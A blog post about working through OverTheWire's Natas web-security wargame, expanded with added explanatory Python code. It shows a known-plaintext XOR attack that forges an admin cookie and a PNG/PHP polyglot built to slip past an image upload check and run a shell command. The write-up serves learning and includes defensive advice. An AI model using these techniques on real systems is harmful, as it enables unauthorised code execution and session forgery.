
How much do I really know about Web Security?

Today I moved onto the next game series on OverTheWire (are they really games?), Natas. Thanks to my friend, Sam, I realized that this was the reverse spelling of 'Satan'. More importantly, the series is about web security. I could not have been more excited this morning to realize that I would be exploiting a website on an Apache server.

I have had a lot of security tips and tricks ingrained into me, but I have never actually tried to abuse a lack of security. I have never even tried to break one of my own sites. This has been all I ever wanted.

The first few levels of Natas were basically 'Can you use the Inspect tool?'. I blew through these (grinning the whole time). After that, abusing insecure directory permissions. A little later, manually setting cookies. It was pretty clear that the servers were intentionally configured poorly.

Then, PHP was introduced. Again, more abuse of bad directory permissions. The first real challenge for me was when a cookie was encrypted using XOR with a secret key. I vaguely remembered from my college cryptography course that you can recover the key from XOR somehow. After some Googling, the answer wasn't too hard, but it did require some programming (to my surprise, I thought this series was going to be easy).
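The post leaves the XOR part at "somehow", so here is the attack worked through. This is an added example, not code from the post or from OverTheWire: the cookie layout (base64 of plaintext XOR a repeating key), the key and the settings string are constructed stand-ins, not the real Natas values. The point it shows is that XOR with a repeating key falls to a single known plaintext: ciphertext XOR plaintext hands back the key stream, and the key is just its shortest repeating unit.

```python
import base64
from itertools import cycle

# Constructed scenario (not the real Natas values): the server stores a
# settings blob in a cookie as base64(settings XOR secret_key), repeating the
# key. The attacker knows the default settings because the server hands them
# out on first visit, which is exactly the known plaintext the attack needs.
SECRET_KEY = b"s3cr3t"                 # what the server knows and we want back
DEFAULT_SETTINGS = b'{"theme":"dark","admin":"no","lang":"en"}'


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """XOR data with key, repeating the key as often as needed."""
    return bytes(d ^ k for d, k in zip(data, cycle(key)))


def make_cookie(plaintext: bytes, key: bytes) -> str:
    """Server side (constructed): XOR, then base64 so it fits in a cookie."""
    return base64.b64encode(xor_bytes(plaintext, key)).decode()


def decrypt_cookie(cookie: str, key: bytes) -> bytes:
    """Server side: undo base64, then XOR again (XOR is its own inverse)."""
    return xor_bytes(base64.b64decode(cookie), key)


def recover_key_stream(ciphertext: bytes, known_plaintext: bytes) -> bytes:
    """Known-plaintext attack: c = p XOR k, so c XOR p = k, byte for byte.
    Only as many key-stream bytes as we have known plaintext come back."""
    n = min(len(ciphertext), len(known_plaintext))
    return xor_bytes(ciphertext[:n], known_plaintext[:n])


def shortest_repeating_unit(stream: bytes) -> bytes:
    """The recovered stream is the key repeated, so the key is the shortest
    prefix that tiles the whole stream. Caveats: if the known plaintext is
    shorter than one full key this returns a partial key (the stream itself);
    if the key is itself periodic (b"abab") the shorter period is returned,
    which still decrypts correctly."""
    for length in range(1, len(stream) + 1):
        candidate = stream[:length]
        tiled = (candidate * (len(stream) // length + 1))[:len(stream)]
        if tiled == stream:
            return candidate
    return stream


def recover_key(cookie: str, known_plaintext: bytes) -> bytes:
    """Attacker side: decode the cookie, XOR with what we know, collapse."""
    stream = recover_key_stream(base64.b64decode(cookie), known_plaintext)
    return shortest_repeating_unit(stream)


# The cookie the constructed server would hand a fresh visitor.
COOKIE = make_cookie(DEFAULT_SETTINGS, SECRET_KEY)

if __name__ == "__main__":
    key = recover_key(COOKIE, DEFAULT_SETTINGS)
    print("recovered key:", key)
    forged = make_cookie(b'{"theme":"dark","admin":"yes","lang":"en"}', key)
    print("server decrypts forged cookie to:", decrypt_cookie(forged, SECRET_KEY))
```

Once the key is out, the attacker re-encrypts any plaintext they like and the server, which trusts the cookie because it "decrypts fine", accepts it. That is the real lesson of the level: XOR hides bytes but does not authenticate them.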

I would like to go into detail on one of the challenges I completed today (I finished 15/32).

Natas13

For this challenge, I was presented with a file-upload form, and the ability to see the PHP code for the page (I imagine real hackers don't get this privilege). Anyway, only image files are allowed to be uploaded and it was checked with exif_imagetype(). In summary, PHP checks the first few bytes to ensure it's an image. There's no getting around this.

Luckily, I accidentally learned about the PNG file format during my research of an earlier challenge. Basically, the first eight bytes of a PNG must be the following:

137 80 78 71 13 10 26 10

Basically, the first byte has its most significant bit set, followed by the letters 'PNG', a carriage return, a line-feed, ^Z, and another line-feed. As someone who knows almost nothing about file encodings, this was extremely fascinating to me. To see just how cool this is, check out the hexdump of this 1x1 PNG:

nick@nick-dev:~/Downloads$ xxd pixel.png 
00000000: 8950 4e47 0d0a 1a0a 0000 000d 4948 4452  .PNG........IHDR
00000010: 0000 0001 0000 0001 0103 0000 0025 db56  .............%.V
00000020: ca00 0000 0467 414d 4100 00b1 8f0b fc61  .....gAMA......a
00000030: 0500 0000 0173 5247 4200 aece 1ce9 0000  .....sRGB.......
00000040: 0020 6348 524d 0000 7a26 0000 8084 0000  . cHRM..z&......
00000050: fa00 0000 80e8 0000 7530 0000 ea60 0000  ........u0...`..
00000060: 3a98 0000 1770 9cba 513c 0000 0006 504c  :....p..Q<....PL
00000070: 5445 ffff ffff ffff 557c f56c 0000 0001  TE......U|.l....
00000080: 7452 4e53 0040 e6d8 6600 0000 0162 4b47  tRNS.@..f....bKG
00000090: 4400 8805 1d48 0000 0009 7048 5973 0000  D....H....pHYs..
000000a0: 0048 0000 0048 0046 c96b 3e00 0000 0a49  .H...H.F.k>....I
000000b0: 4441 5408 d763 6000 0000 0200 01e2 21bc  DAT..c`.......!.
000000c0: 3300 0000 2574 4558 7464 6174 653a 6372  3...%tEXtdate:cr
000000d0: 6561 7465 0032 3031 322d 3039 2d31 3754  eate.2012-09-17T
000000e0: 3135 3a32 343a 3233 2b30 323a 3030 f856  15:24:23+02:00.V
000000f0: a611 0000 0025 7445 5874 6461 7465 3a6d  .....%tEXtdate:m
00000100: 6f64 6966 7900 3230 3038 2d30 312d 3032  odify.2008-01-02
00000110: 5432 333a 3133 3a30 382b 3031 3a30 3084  T23:13:08+01:00.
00000120: 186b 3e00 0000 0049 454e 44ae 4260 82    .k>....IEND.B`.

Notice that the first eight bytes (in hexadecimal) are 8950, 4e47, 0d0a, and 1a0a. You will notice that these line up with what I said they should earlier: 89 in hexadecimal is equivalent to 137 in decimal, 50 in hexadecimal is equivalent to 80 in decimal (the letter 'P' using ASCII encoding), so on and so forth...

So, I wrote a PHP script, and manually inserted those eight bytes by pasting them into Vim. However, when I did a hexdump of the file, the first byte was something different. No matter, I am a bash expert now. So I googled how to delete the first byte of a file. Turns out you can do it with dd:

dd if=source.php of=target.php ibs=1 skip=1

ibs is the input block size in bytes, and skip is how many of those input blocks to skip at the beginning of the file. I learned this from man. I am proud of myself.

Anyway, the command worked. I had a "PNG" file. However, when I uploaded it to the server, it said my PNG file was corrupted with ASCII text. I wasn't sure how to fix that, so I changed tactics.

I took that 1x1 PNG image (from earlier), opened it in vim, and wrote PHP. Guess what? Yeah, it worked. This is what it looks like in vim:

[image: pwned-2]

The trick of the game is that it uploads your file to a random path on the server, and then gives you the link to access the file. It also tries to set the extension to '.jpg', but that was easily changed by manipulating the form input on the page. After requesting the file from the server, the password at /etc/natas_webpass/natas14 was displayed. Yay.
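To make the PNG part concrete, here is the whole procedure in Python: a minimal stand-in for the header check exif_imagetype() performs, a tiny valid PNG built from scratch, the PHP appended after it, and a chunk walker showing why an image parser never sees the payload. This is an added example, not code from the post or the Natas server. The check function, the PNG and the payload are constructed here; the assumption that pasting the signature into a UTF-8 editor is what mangled the first byte is mine, not something the post states.

```python
import struct
import zlib

PNG_SIGNATURE = bytes([137, 80, 78, 71, 13, 10, 26, 10])  # 89 50 4e 47 0d 0a 1a 0a


def looks_like_png(data: bytes) -> bool:
    """Header-only check in the spirit of exif_imagetype(): only the first
    eight bytes are inspected, so whatever follows is accepted unread.
    (The real function recognises many formats; this stand-in does PNG only.)"""
    return data[:8] == PNG_SIGNATURE


def pasted_as_text() -> bytes:
    """Assumption about the failed first attempt: the signature typed into a
    UTF-8 editor as characters, not raw bytes. U+0089 encodes as c2 89, so the
    file no longer starts with 0x89 and the header check fails."""
    return "\x89PNG\r\n\x1a\n".encode("utf-8") + b"<?php echo 'x'; ?>"


def png_chunk(ctype: bytes, payload: bytes) -> bytes:
    """PNG chunk layout: 4-byte big-endian length, 4-byte type, data,
    CRC32 over type+data. This is the IHDR/IEND structure in the hexdump."""
    crc = zlib.crc32(ctype + payload) & 0xFFFFFFFF
    return struct.pack(">I", len(payload)) + ctype + payload + struct.pack(">I", crc)


def minimal_png() -> bytes:
    """A constructed, renderable 1x1 8-bit greyscale PNG: signature, IHDR,
    one IDAT scanline (filter byte 0 + one pixel), IEND."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0)  # w, h, depth, colour, comp, filter, interlace
    idat = zlib.compress(b"\x00\x00")
    return PNG_SIGNATURE + png_chunk(b"IHDR", ihdr) + png_chunk(b"IDAT", idat) + png_chunk(b"IEND", b"")


def polyglot(payload: bytes) -> bytes:
    """The working approach from the post: a real PNG with PHP appended.
    Image code stops at IEND; PHP echoes the binary prefix verbatim and runs
    whatever sits inside <?php ... ?>, so both sides are happy."""
    return minimal_png() + payload


def chunk_names(data: bytes) -> list:
    """Walk the chunk list the way an image parser does, stopping at IEND.
    Anything after IEND (our payload) is never reached."""
    if not looks_like_png(data):
        return []
    names, pos = [], 8
    while pos + 8 <= len(data):
        (length,) = struct.unpack(">I", data[pos:pos + 4])
        ctype = data[pos + 4:pos + 8]
        names.append(ctype)
        pos += 12 + length  # length + type + data + crc
        if ctype == b"IEND":
            break
    return names


if __name__ == "__main__":
    PAYLOAD = b"<?php echo shell_exec('id'); ?>"  # constructed payload
    print("pasted as text passes check?", looks_like_png(pasted_as_text()))
    print("polyglot passes check?", looks_like_png(polyglot(PAYLOAD)))
    print("chunks a parser sees:", chunk_names(polyglot(PAYLOAD)))
```

The defence follows from the same picture: a magic-byte check proves only that the first eight bytes look right. What actually makes this exploitable is that the server lets the client pick the extension and stores the upload somewhere Apache will hand to PHP; strip and re-encode the image, force a non-executable extension server-side, and serve uploads from a path where PHP does not run.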

A last note on this level: None of the previous levels had made me worry about my own server security at all. They were mostly about code injection. I am always careful about that. However, this level was really interesting. I knew that executing code in a PNG was possible, but I always thought it was hard or something; that isn't the case.

Conclusion

I can't emphasize enough how excited I am to be on the offense instead of defense. I have actually been given the ability to just play with security, and without having to set it up myself. Sure, I'm practically handed the solutions, but the challenges seem like an amazing introduction. I really feel like I'm learning the foundations.

My goal is that I will eventually learn enough to exploit my own server setups. I mostly rely on default DigitalOcean configuration. How good is it? Can I hack myself? I'm really curious to find out.

If you are interested in trying out this challenge for yourself, go to the Natas page on OverTheWire, and read the instructions. If you want to read more about these wargames, you can read my previous blog post.

On a final note: It has been much harder to get into the hacker mindset than I had anticipated. I got stuck on at least three of the problems today and had to turn to Google for some assistance. I'm still moving along, though, and I am enthusiastic about the future.